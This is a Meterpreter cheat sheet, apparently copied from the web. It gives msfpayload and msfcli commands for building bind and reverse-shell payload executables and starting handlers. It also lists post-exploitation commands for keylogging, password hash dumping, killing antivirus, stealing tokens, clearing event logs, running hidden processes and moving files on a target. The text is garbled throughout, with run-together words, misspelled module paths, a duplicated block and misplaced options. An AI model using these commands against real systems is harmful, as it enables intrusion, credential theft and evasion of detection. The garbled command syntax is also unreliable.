Meterpreter Cheat Sheet

Executing Meterpreter

As a MetasploitExploitPayload(bind_tcp) forbindshellor(reverse_tcp) forreverse shell
As Standalonebinarytobeuploadedand executedonthetarget system:
./msfpayloadwindows/meterpreter/bind_tcpLPORT=443 X > meterpreter.exe (BindShell)
./msfcliexploit/multi/handlerPAYLOAD=windows/meterpeter/bind_tcpLPORT=443 RHOST=<IP>
./msfpayloadwndows/meterpreter/reverse_tcpRHOST=<IP> RPORT=443 X > meterpreter.exe (Reverse Shell)
./msfcliexploit/multi/handlerPAYLOAD=windows/meterpreter/reverse_tcpLPORT=443 E

 UserInterface Commands
meterpreter> keyscan_start
Starts recording user key typing
meterpreter>keyscan_dump
Dumps the user’s key strokes
meterpreter> keyscan_stop
Stops recording user typing

Core Commands


meterpreter> background
PutstheMeterpretersession inbackground mode.Session could berecovered typing:
sessions–l ( toidentifysessionID)
sessions–i <SessionID>
meterpreter> irb
Opens meterpreterscripting menu
meterpreter> use <library>
Permitsloadingextrameterpreter functionalities with the following loadable libraries
 espia
incognito
priv
sniffer
Allows Desktop spying through screenshots
Allows user impersonation sort of commands
Allows filesystem and hash dumping commands
Allows network sniffing interaction commands


 meterpreter> run<script>


crcheckvm
edcollect
get_local_subnets
getcountermeasure
getgui
gettelnet
hashdump
keylogrecorder
killav
metsvc
migrate
netenum
prefetchtool
vnc_oneport/ vnc
sheduleme
winenum

File System Commands


meterpreter> getwd
Obtain current working directory on Server’s Side
meterpreter> getlwd
Obtain local current working directory
meterpreter> del <file>
Deletes the given file
meterpreter> cat <file>
Read the given file
meterpreter> edit <file>
Edit the given file
meterpreter> upload <src file> <dst file>
Upload a file to the target host
meterpreter> download <src file> <dst file>
Download a file from the target host


Networking Commands


meterpreter> portfwd
Establishportforwardingconnectionsthroughmeterpretertunnels:
Options:
-L Local host to listen on
-l Local port to listen on
-p Remote port to connect to
-r Remote host to connect

 SystemCommands
 meterpreter> sysinfo
Provides information about target host
meterpreter> getuid
Obtain the username responsible for the current process
meterpreter> kill <pid>
Kill the given process identified by PID
meterpreter> ps
List all running processes
meterpreter> shell
Obtain interactive windows OS Shell
 meterpreter> execute –f file [Options]
Execute the given “file” on the OS target host.
Options:
-H Create the process hidden from view
-a Arguments to pass to the command
-i Interact with the process after creating it
-m Execute from memmory
-t Execute process with currently impersonated thread token


meterpreter> clearav
Clears and secure removes event logs


meterpreter> steal_token
Attemps to steal an impersonation token from the target process
meterpreter> reg <Command> [Options]
Interact with the target OS Windows Registry using the following options and commands:
commands:
enumkey Enumerate the supplied registry key
createkey / deletekey Create/deleted the supplied registry key
setval / queryval Set/query values from the supplied registry key
meterpreter> execute –f file [Options]
Execute the given “file” on the OS target host.
Options:
-H Create the process hidden from view
-a Arguments to pass to the command
-i Interact with the process after creating it
-m Execute from memmory
-t Execute process with currently impersonated thread token
Options:
-d Data to store in the registry value
-k The registry key
-v The registry value name
meterpreter> ipconfig
Displays network interfaces information


meterpreter> route
View and modify networking routing table


meterpreter> portfwd
Establishportforwardingconnectionsthroughmeterpretertunnels:
Options:
-L Local host to listen on
-l Local port to listen on
-p Remote port to connect to
-r Remote host to connect to




SUMBER GOOGLE